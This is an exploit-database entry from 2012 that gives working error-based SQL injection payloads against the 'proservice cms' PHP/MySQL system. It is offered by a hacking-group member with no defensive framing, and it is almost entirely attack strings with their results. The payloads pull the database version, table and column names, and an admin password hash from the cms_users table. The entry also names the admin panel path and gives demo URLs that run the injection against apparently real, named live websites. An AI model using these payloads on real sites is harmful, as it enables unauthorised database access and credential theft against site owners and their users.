proservice cms Sql Injection Vulnerablity



EKU-ID: 2335 CVE: OSVDB-ID:
Author: cheki Published: 2012-06-19 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: proservice cms Sql Injection Vulnerablity
# Date: 18-06-2012
# Author: cheki
# Vendor Link: http://proservice.ge/
# Category:WebApp
# Price: NULL
# Contact: anrivardanidze@gmail.com
# Website: www.1337day.com && hacking.ge
# Greetings to: Anuka Bolqvadze and to rest of the 1337day members

 

########################################################################################
[Product Detail]

Studio "PRO-Service" is a company which has serious technical-intelectual base to
make a suitable production for you and provide the development of internet resources
in Georgia.

Code: PHP

Database: MYSQL
########################################################################################
[Vulnerability]

SQL Injection:

http://<TARGET>/index.php?m=21&rec_id=[Sql]
http://<TARGET>/?m=268&cat_id=[Sql]

########################################################################################
Exploit: +and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry '5.0.811' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'login1' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+column_name+from+information_schema.columns+where+table_name='cms_users'+limit+13,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'password1' for key 1

Exploit: +and+(select+1+from+(select+count(0),concat((select+password+from+cms_users+limit+0,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+

Result: Duplicate entry 'd5e42cf45369ba368f3e97d4a8981b981' for key 1

#########################################################################################

G0 T0 Admin panel: http://<TARGET>/pcms/

#########################################################################################

D3m0: http://populi.ge/index.php?m=21&rec_id=7%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+password+from+cms_users+limit+0,1%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+

D3m0: http://www.ee.ge/?m=268&cat_id=1224%27+and+%28select+1+from+%28select+count%280%29,concat%28%28select+version%28%29%29,floor%28rand%280%29*2%29%29+from+information_schema.tables+group+by+2%29a%29--+&stock_status=2